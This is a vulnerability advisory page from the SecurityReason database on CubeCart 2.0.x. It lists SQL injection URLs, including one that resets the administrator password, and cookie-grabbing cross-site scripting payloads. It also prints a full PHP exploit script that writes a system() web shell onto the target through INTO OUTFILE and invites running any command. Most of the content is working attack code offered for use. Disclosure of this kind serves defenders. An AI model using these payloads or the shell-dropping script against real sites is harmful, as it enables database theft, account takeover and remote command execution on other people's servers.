|
 |
| SecurityReason | ||
| WLB | ||
| Services | ||
| RSS | ||
| Corporate | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
Home  SecurityAlert Database |
||||
SecurityAlert : 1662 CVE : CVE-2006-5109 CVE : CVE-2006-5108 CVE : CVE-2006-5107 SecurityRisk : Medium  (About) Remote Exploit : Yes Local Exploit : No Exploit Available : Yes Credit : HACKERS PAL Published : 03.10.2006
Advisory Content : Hello,, CubeCart Multiple input Validation vulnerabilities Discovered By : HACKERS PAL Copy rights : HACKERS PAL Website : http://www.soqor.net Email Address : security (at) soqor (dot) net [email concealed] Sql injection admin/forgot_pass.php?submit=1&user_name=-1'or%201=1/* it will reset the password for the administrator -- admin/forgot_pass.php?submit=1&user_name=-1'%20union%20select%201,2,3,4, 5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 ,31,32,33,34,35,36,37,38,39,40,41,42/* -- view_order.php?order_id='%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30/* -- view_doc.php?view_doc=-1'%20union%20select%201,2/* -- admin/print_order.php?order_id='%20union%20select%201,2,3,4,5,6,7,8,9,10 ,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30/* /***************************************/ xss admin/print_order.php?order_id=<script>alert(document.cookie);</script> -- view_order.php?order_id=<script>alert(document.cookie);</script> -- admin/nav.php?site_url="><script>alert(document.cookie);</script><noscri pt> admin/nav.php?la_search_home=<script>alert(document.cookie);</script> and language variables for this file .. -- admin/image.php?image=<script>alert(document.cookie);</script> -- admin/header.inc.php?site_name=</title><script>alert(document.cookie);</ script> admin/header.inc.php?la_adm_header=</title><script>alert(document.cookie );</script> admin/header.inc.php?charset='><script>alert(document.cookie);</script> and all other variables in this file -- footer.inc.php?la_pow_by=<script>alert(document.cookie);</script> -- header.inc.php?site_name=</title><script>alert(document.cookie);</script > and all other variables in the file. -- /***************************************/ Full path information.php language.php link_navi.php?cat_id=1 list_docs.php popular_prod.php sale.php check_sum.php spotlight.php cat_navi.php /***************************************/ Exploit :- #!/usr/bin/php -q -d short_open_tag=on <? /* /* CubeCart Remote sql injection exploit /* By : HACKERS PAL /* WwW.SoQoR.NeT /* /* Tested on CubeCart 2.0.X and maybe other versions are injected */ print_r(' /**********************************************/ /* CubeCart Remote sql injection exploit */ /* by HACKERS PAL <security (at) soqor (dot) net [email concealed]> */ /* site: http://www.soqor.net */'); if ($argc<2) { print_r(' /* -- */ /* Usage: php '.$argv[0].' host /* Example: */ /* php '.$argv[0].' http://localhost/CubeCart/ /**********************************************/ '); die; } error_reporting(0); ini_set("max_execution_time",0); ini_set("default_socket_timeout",5); $url=$argv[1]; $exploit1="/cat_navi.php"; Function get_page($url) { if(function_exists("file_get_contents")) { $contents = file_get_contents($url); } else { $fp=fopen("$url","r"); while($line=fread($fp,1024)) { $contents=$contents.$line; } } return $contents; } $page = get_page($url.$exploit1); $pa=explode("<b>",$page); $pa=explode("</b>",$pa[2]); $path = str_replace("cat_navi.php","",$pa[0])."soqor.php"; $var=' '; $var = str_replace(" ","",$var); $path = str_replace($var,"/",$path); $exploit2="/view_doc.php?view_doc=-1'%20union%20select%20'<?php%20system (".'$_GET[cmd]'.");%20?>','WwW.SoQoR.NeT'%20INTO%20OUTFILE%20'$path'%20f rom%20store_docs/*"; $page_now = get_page($url.$exploit2); if(ereg("mysql_fetch_array()",$page_now)) { $newurl=$url."/soqor.php?cmd=id"; Echo "n[+] Go TO ".str_replace("//","/",$newurl)."n[+] Change id to any command you want :)"; } else { Echo "n[-] Exploit Faild"; } Die("n/* Visit us : WwW.SoQoR.NeT */n/**********************************************/"); ?> #WwW.SoQoR.NeT  Feedback : If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com. |
||||
| Alert | ||
libc:fts_*() Multiple Denial of Service
The fts functions are provided for traversing UNIX file hierarchies... |
||
| Apache |  |
|
» Apache Tomcat 6.0.20 and |
||
» Apache Tomcat 6.0.20 and |
||
» Apache Tomcat 6.0.20 and |
||
| PHP | |
|
- 2009-10-02| Copyright © SecurityReason.com. All Rights Reserved. |